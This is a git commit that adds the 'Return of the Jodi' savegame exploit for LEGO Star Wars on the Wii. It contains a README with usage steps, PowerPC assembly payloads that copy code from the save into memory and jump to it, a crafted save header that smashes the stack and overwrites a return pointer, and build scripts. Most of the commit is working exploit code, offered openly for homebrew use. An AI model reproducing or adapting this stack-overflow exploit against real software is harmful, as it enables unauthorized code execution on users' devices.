LEGO Star Wars by roto

This commit is contained in:
Bernhard Urban 2011-02-02 03:14:14 +01:00 committed by Segher Boessenkool
parent da886e2a72
commit c58aa93d1e
23 changed files with 372 additions and 0 deletions

View File

@ -53,6 +53,7 @@ all: FORCE .version
$(Q)$(MAKE) -C twilight
$(Q)$(MAKE) -C lego
$(Q)$(MAKE) -C batman
$(Q)$(MAKE) -C lsw
FORCE:
@ -62,3 +63,4 @@ clean:
$(MAKE) -C twilight clean
$(MAKE) -C lego clean
$(MAKE) -C batman clean
$(MAKE) -C lsw clean

5
lsw/.gitignore vendored Normal file
View File

@ -0,0 +1,5 @@
rlg?.bin
FILE_V28
exploit.bin
exploit.elf
title.bin

127
lsw/Makefile Normal file
View File

@ -0,0 +1,127 @@
# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
# Copyright 2011 roto <roto@mozy.org>
# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
# This code is licensed to you under the terms of the GNU GPL, version 2;
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
# Configuration:
# What toolchain prefix should we use
CROSS ?= broadway-
# Where are the tools (http://git.infradead.org/users/segher/wii.git)
TOOLS ?= $(HOME)/wii/segher
# End of configuration.
# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
ifeq ($(origin CC), default)
CC := $(CROSS)gcc -m32
endif
ifeq ($(origin LD), default)
LD := $(CROSS)ld
endif
OBJCOPY ?= $(CROSS)objcopy
# The compiler flags we need.
CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
# Build with "V=1" to see the commands executed; be quiet otherwise.
ifeq ($(V),1)
Q :=
else
Q := @
MAKEFLAGS += --no-print-directory
endif
targets := rlge.bin rlgp.bin rlgj.bin
ppms := $(targets:%.bin=%-icon.ppm) generic-banner.ppm
assets := title.bin $(ppms)
loader := ../loader/loader.bin
titleid = $(shell perl titleid.pl $(1))
define twintig
D=$(call titleid,$(1)); \
$(TOOLS)/twintig $$D $@ toc-$1
endef
all: $(targets)
$(targets): %.bin: toc-% FILE_V28 $(assets)
@echo " TWINTIG $@"
$(Q)$(call twintig,$*)
FILE_V28: head.bin exploit.bin $(loader)
@echo " LEGOSTACK $@"
$(Q)./pack.sh $@ $^
$(Q)$(TOOLS)/lego-cksum $@ 32380 #32328 #32688
head.bin: head.elf
@echo " OBJCOPY $@"
$(Q)$(OBJCOPY) -Obinary $< $@
exploit.bin: exploit.elf
@echo " OBJCOPY $@"
$(Q)$(OBJCOPY) -Obinary $< $@
exploit.elf: lego.lds exploit.o
@echo " LINK $@"
$(Q)$(LD) -T $^ -o $@
head.elf: head.o
@echo " LINK $@"
$(Q)$(LD) -e 0 $< -o $@
exploit.o: exploit.s
@echo " ASSEMBLE $@"
$(Q)$(CC) $(CFLAGS) -c $< -o $@
head.o: head.s head.b exploit2.s exploit.bin
@echo " ASSEMBLE $@"
$(Q)$(CC) $(CFLAGS) \
-Wa,--defsym,exploitlen=$(shell wc -c exploit.bin | awk '{ print $$1 }') \
-c $< -o $@
title.bin: ../.version
@echo " TITLEBIN $@"
$(Q)perl make-title-bin.pl > $@
../.version: FORCE
$(Q)$(MAKE) -C .. .version
$(ppms): %.ppm: %.png
@echo " PPM $@"
$(Q)convert $< $@
zero16k:
$(Q)dd if=/dev/zero bs=18256 count=1 2>/dev/null > $@
#17332
#16384
FAILURE:
$(Q)echo FAILURE > $@
$(loader): FORCE
$(Q)$(MAKE) -C ../loader
FORCE:
clean:
-rm -f $(targets) FILE_V28
-rm -f exploit.bin exploit.elf exploit.o
-rm -f head.bin head.elf head.o
-rm -f title.bin

41
lsw/README Normal file
View File

@ -0,0 +1,41 @@
Copyright 2011 roto <roto@mozy.org>
Copyright 2011 Bernhard Urban <lewurm@gmail.com>
Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
Copyright 2008 Haxx Enterprises <bushing@gmail.com>
Copyright 2008 Hector Martin "marcan" <marcan@marcansoft.com>
Copyright 2003-2004 Felix Domke <tmbinc@elitedvb.net>
This code is licensed to you under the terms of the GNU GPL, version 2;
see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
Console font created by Freddy Leitner [www.dreamer.de], based on
the Droid Sans Mono font [www.droidfonts.com].
--
This is the Lego Star Wars exploit known as "Return of the Jodi". This exploit
works on all versions of the game (including 1.01) in all regions that are
currently known to have a release.
Instructions:
1. Copy the save to your SD card.
2. Put a "boot.elf" (such as the HackMii installer or Homebrew Channel) into the
ROOT of your SD card (not into any folder).
3. Copy the save to your Wii system, make sure you have a save for this game
already on your system, otherwise you won't be able to copy the exploit
save over.
4. Start up the game, load the first save slot (on the left, at 0.0%)
5. As soon as the level loads, run to the right and you'll see two characters
floating. Run to the area in front of them and you'll see "Return of Jodi"
show up, press the "A" button on your Wiimote and your boot.elf will run!
Credits:
Team Twiizers - Original LIJ release, source, savezelda (and many other things).
roto - Developing and testing this exploit.
lewurm - Cleaning up, fixing bugs, testing.
drmr - Awesome banner/icons!
Thanks:
Everyone!

38
lsw/exploit.s Normal file
View File

@ -0,0 +1,38 @@
# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
# Copyright 2011 roto <roto@mozy.org>
# This code is licensed to you under the terms of the GNU GPL, version 2;
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
.section .start,"ax"
start:
# Set up a stack frame.
lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
# Stop audio and video.
lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
# Move code into place; a generous 32kB, starting at 64kB in
# the save file.
# Load address where we're going to move our exploit code to
# (0x90000020) into R03
lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
# Load the address for the beginning of our save data
# (0x91168ea0) into R04
lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
addis 4,4,1 ; addi 4,4,end-start
li 0,0x2000 ; mtctr 0
0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
# Sync caches on it.
li 0,0x0400 ; mtctr 0 ; mr 5,3
0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
sync ; isync
# Jump to 0x90000020 and go for it!
mtctr 3 ; bctr
end:

57
lsw/exploit2.s Normal file
View File

@ -0,0 +1,57 @@
# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
# Copyright 2011 roto <roto@mozy.org>
# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
# This code is licensed to you under the terms of the GNU GPL, version 2;
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
bptr = 0x91178ea0
save = 0x91177f40
main = 0x90000020
audio_stop_usa = 0x8038ce9c
video_stop_usa = 0x8039971c
audio_stop_eur = 0x8038cfec
video_stop_eur = 0x80399708
audio_stop_data = 0x9421fff0 # stwu 1,-16(1)
video_stop_data = 0x9421ffe0 # stwu 1,-32(1)
# Set up a stack frame.
lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
# Stop audio.
lis 10,audio_stop_data@h ; ori 10,10,audio_stop_data@l
lis 3,audio_stop_usa@h ; ori 3,3,audio_stop_usa@l; lwz 5,0(3)
cmpw 5,10 ; beq execa
lis 3,audio_stop_eur@h ; ori 3,3,audio_stop_eur@l
execa:
mtctr 3 ; bctrl
# Stop video.
lis 10,video_stop_data@h ; ori 10,10,video_stop_data@l
lis 3,video_stop_usa@h ; ori 3,3,video_stop_usa@l; lwz 5,0(3)
cmpw 5,10 ; beq execv
lis 3,video_stop_eur@h ; ori 3,3,video_stop_eur@l
execv:
mtctr 3 ; bctrl
# Move code into place; a generous 32kB, starting at 64kB in
# the save file.
lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
addis 4,4,1 ; addi 4,4,exploitlen # offset for exploit.bin
li 0,0x2000 ; mtctr 0
loop1:
lwzu 0,4(4) ; stwu 0,4(5) ; bdnz loop1
# Sync caches on it.
li 0,0x0400 ; mtctr 0 ; mr 5,3
loop2:
dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz loop2
sync ; isync
# Go for it!
mtctr 3 ; bctr

BIN
lsw/generic-banner.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 20 KiB

BIN
lsw/generic-banner.ppm Normal file

Binary file not shown.

BIN
lsw/head.b Executable file

Binary file not shown.

43
lsw/head.s Normal file
View File

@ -0,0 +1,43 @@
# Copyright 2011 roto <roto@mozy.org>
# This code is licensed to you under the terms of the GNU GPL, version 2;
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
bptr = 0x91178ea0
0:
# Part of the savefile
.long 0x00000001, 0x00000000, 0x00000000, 0x00000000
.long 0x00000000, 0x00000013, 0x0000000d, 0x00000000
.long 0x00000002, 0x00000000, 0x000007db, 0x00000000
.long 0x00000001, 0x0000029e, 0x0000019d, 0x00050000
.long 0x01010008, 0x060a0100, 0x00000001, 0x00000000
.long 0x00000000, 0x00000000, 0x00000000, 0x00000000
# Filler
.fill 0xF60 - (. - 0b)
exploitv2:
# This is necessary for the 2nd exploit (first release) of LSW
.include "exploit2.s"
# More filler
.fill 0x7860 - (. - 0b)
# Insert rest of the save
.incbin "head.b"
# Smack the stack.
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111, 0x11111111, 0x11111111, 0x11111111
.long 0x11111111
# Depending on the version we jump now to exploit.s or to "exploit2v:"
.long 0x11111111, bptr, 0x11111111, 0x11111111
.fill 0x10000 - (. - 0b)

26
lsw/lego.lds Normal file
View File

@ -0,0 +1,26 @@
/* Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
This code is licensed to you under the terms of the GNU GPL, version 2;
see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
OUTPUT_FORMAT("elf32-powerpc")
OUTPUT_ARCH(powerpc:common)
SECTIONS {
audio_stop = 0x8038ce90;
video_stop = 0x80399708;
save = 0x91168ea0;
bptr = 0x91178ea0;
main = 0x90000020;
.twilight save :
{
rli*.o(.start)
*(.text)
*(.rodata .rodata.*)
*(.data)
*(.bss)
/* . = 0x0a94; */
}
}

16
lsw/make-title-bin.pl Executable file
View File

@ -0,0 +1,16 @@
#!/usr/bin/perl
sub printline {
my $x = shift;
chomp $x;
$x .= "\0" x 32;
$x = substr $x, 0, 32;
$x =~ s/(.)/\0$1/g;
print $x;
}
$name = "Return of the Jodi";
$version = `cat ../.version`;
printline $name;
printline $version;

3
lsw/pack.sh Executable file
View File

@ -0,0 +1,3 @@
#!/bin/bash
TARGET=$1; shift
cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET

BIN
lsw/rlge-icon.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.9 KiB

BIN
lsw/rlge-icon.ppm Normal file

Binary file not shown.

BIN
lsw/rlgj-icon.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.9 KiB

BIN
lsw/rlgj-icon.ppm Normal file

Binary file not shown.

BIN
lsw/rlgp-icon.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.9 KiB

BIN
lsw/rlgp-icon.ppm Normal file

Binary file not shown.

2
lsw/titleid.pl Executable file
View File

@ -0,0 +1,2 @@
#!/usr/bin/perl
print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];

4
lsw/toc-rlge Normal file
View File

@ -0,0 +1,4 @@
title.bin
generic-banner.ppm
rlge-icon.ppm
FILE_V28 FILE_V28

4
lsw/toc-rlgj Normal file
View File

@ -0,0 +1,4 @@
title.bin
generic-banner.ppm
rlgj-icon.ppm
FILE_V28 FILE_V28

4
lsw/toc-rlgp Normal file
View File

@ -0,0 +1,4 @@
title.bin
generic-banner.ppm
rlgp-icon.ppm
FILE_V28 FILE_V28